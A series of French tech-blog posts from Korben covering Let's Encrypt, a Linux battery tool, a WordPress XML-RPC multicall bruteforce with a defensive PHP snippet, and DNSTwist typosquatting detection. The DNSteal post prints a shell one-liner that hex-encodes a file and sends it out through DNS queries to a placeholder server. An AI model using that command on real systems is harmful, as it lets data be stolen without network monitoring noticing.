Mise à jour de la base de données, veuillez patienter...

Si vous voulez un certificat SSL pour votre serveur web, qui soit reconnu officiellement par la plupart des navigateurs, c'est possible et gratuitement avec Let's Encrypt.

Annoncé l'année dernière, ce service proposé par Mozilla, l'EFF, l'Internet Society, Cisco, Automatic...etc va permettre d'améliorer grandement la sécurité des sites web en permettant à tous de se créer un certificat reconnu par la société IdenTrust (autorité certifiante).

Pour le moment, Let's Encrypt est en beta privée mais notez la date du 16 novembre dans votre calendrier, car à ce moment-là, chacun pourra générer son propre certificat.

Cette initiative existe uniquement grâce au soutien de volontaires et aux dons faits par les gens et les sociétés qui pensent que cela est important. Si vous aussi, vous trouvez ça important, vous pouvez faire un don.

Source

Cet article merveilleux et sans aucun égal intitulé : Let’s Encrypt vous permettra dès le mois prochain, d’avoir un certificat SSL reconnu par tous les navigateurs ; a été publié sur Korben, le seul site qui t'aime plus fort que tes parents.

Voici un proof of concept intéressant qui s'appelle DNSteal et qui permet de transférer des documents via le net, de manière très discrète en utilisant le protocole DNS. DNSteal est un script python qui fait office de faux serveur DNS et qui peut recevoir en entrée des fichiers.

Une fois en place, il suffit par exemple de lancer la commande suivante pour transférer l'image send.png au faux serveur DNS.

for b in $(xxd -p file/to/send.png); do dig @server $b.filename.com; done

C'est plutôt rigolo non ?

DNSteal supporte aussi le transfert multi-fichiers et la compression de ceux-ci. Son développeur s'est fait plaisir :)

Si vous voulez plus d'infos, c'est sur Github que ça se passe.

Cet article merveilleux et sans aucun égal intitulé : Transférer des fichiers en utilisant des requêtes DNS ; a été publié sur Korben, le seul site qui t'aime plus fort que tes parents.

Si vous bossez sur un ordinateur portable (Linux), vous avez dû remarquer que certaines applications vidaient assez rapidement la batterie. Pas cool mais bon, si vous pensez à les fermer à la main, dès que vous débranchez le câble d'alimentation, ça le fait.

Si vous y pensez...

Pour les autres, les têtes en l'air comme moi, il y a Powermonious, un script (en Go, donc il vous faudra installer Go) qui permet sur votre machine Linux, de stopper automatiquement certaines applications lorsque vous passez sur la batterie et de les relancer lorsque vous rebasculez sur un branchement secteur.

Pour fonctionner, Powermonius a besoin de UPower, DBus et Bash et pour l'installer, il faut taper la commande suivante :

go get -u github.com/joaomsa/powermonius

Puis vous pouvez configurer les applications à stopper / relancer dans le fichier de conf :

~/.config/powermonius/resource.yaml

Et lancez Powermonious avec la commande suivante :

powermonious

Et voilà ! Je pense que ça va bien vous aider au quotidien !

Cet article merveilleux et sans aucun égal intitulé : Powermonious – Un outil pour économiser la batterie de votre ordinateur portable ; a été publié sur Korben, le seul site qui t'aime plus fort que tes parents.

Si vous utilisez WordPress pour votre site web, sachez qu'une nouvelle méthode d'attaque par bruteforce découverte au début du mois par la société Sucuri permet à un attaquant de tester de très nombreux identifiants et mots de passe avec une simple requête HTTP.

Avec une attaque classique, 1 requête = 1 tentative de login. Mais avec cette attaque qui exploite une faiblesse dans XML-RPC, 1 requête = x tentatives de login.

Évidemment, comme vous ne verrez plus des tonnes de tentatives débouler dans vos logs, cette attaque est plus difficile à détecter. Comme XML-RPC permet de faire passer du XML via HTTP vers WordPress pour déclencher des actions (cron, api, manipulation de données...etc), il est très simple d'encapsuler non pas une mais un grand nombre de demandes de logins dans la même requête XML grâce à la méthode system.multicall.

Ce nombre de demandes est limité uniquement par la mémoire accordée à PHP. Autant dire que plus votre PHP a de mémoire, plus l'attaquant va pouvoir tester en même temps des centaines, voire des milliers d'identifiants en même temps.

Alors, comment se protéger ? Et bien si vous utilisez Cloudflare et que vous avez accès au WAF (Firewall applicatif présent dans la version payante de CF), pensez à activer les règles liées à WordPress.

 

Cliquez sur le jeu de règles et bloquez la WP0018.

Autrement, il vous reste l'option "code" qui consiste à désactiver les appels à la méthode system.multicall en ajoutant ceci dans votre fichier functions.php, en attendant que WordPress publie un patch.

function mmx_remove_xmlrpc_methods( $methods ) {
unset( $methods['system.multicall'] );
return $methods;
}
add_filter( 'xmlrpc_methods', 'mmx_remove_xmlrpc_methods');

Ainsi vous serez protégé des scripts kiddies qui seraient tentés de s'en prendre à votre site. Pensez aussi à mettre un mot de passe un peu plus complexe qui sera difficile de casser avec un simple dictionnaire.

Cet article merveilleux et sans aucun égal intitulé : WordPress – Comment vous protéger de cette nouvelle méthode d’attaque par bruteforce ? ; a été publié sur Korben, le seul site qui t'aime plus fort que tes parents.

Le typosquatting est une technique qui consiste à ramasser un peu de trafic en profitant des erreurs des gens. Par exemple, pour venir me rendre visite, vous tapez Korben.info dans votre barre d'adresse. Mais il arrive parfois que certains se trompent et tapent lorben.info ou jorben.info car les touches "l" et "j" sont placées juste à côté de la touche "k".

Et là, au lieu de tomber sur une erreur, vous arriverez peut-être sur une page web monétisée avec des trucs de merde qui vont rapporter un peu d'argent au typo-squatteur. Je ne sais pas s'il y a des mecs qui arrivent à gagner leur vie comme ça, mais si vous voulez savoir si votre nom de domaine se fait typosquatter, je vous propose d'installer DNSTwist.

Il s'agit d'une application en ligne de commande qui va générer à partir de votre nom de domaine, des noms de domaines erronés et qui va ensuite vérifier s'ils sont typos squattés, c'est-à-dire s'il y a vraiment un serveur qui répond derrière.

Pour que DNSTwist fonctionne, vous devez installer les bibliothèques python suivantes :

sudo apt-get install build-essential libffi-dev python-dev python-pip automake autoconf libtool
sudo BUILD_LIB=1 pip install ssdeep

Puis récupérez le script ici sur Github. Enfin, entrez la commande suivante :

./dnstwist.py VOTREDOMAINE.COM

Vous devriez alors voir sous vos yeux ébahis, tous les domaines typo squatté pour vous voler quelques visiteurs. Évidemment, plus votre nom de domaine est connu, plus il y aura de correspondances. Moi j'en ai que 7 pour le mien, mais par exemple, Youtube, c'est 101 domaines squattés....

Et malheureusement, il n'y a pas grand-chose à faire contre ces vautours, mis à part offrir des formations à vos visiteurs pour qu'ils apprennent à taper sur leur clavier :)

Amusez-vous bien !

Cet article merveilleux et sans aucun égal intitulé : Typo Squatting – Comment le détecter ? ; a été publié sur Korben, le seul site qui t'aime plus fort que tes parents.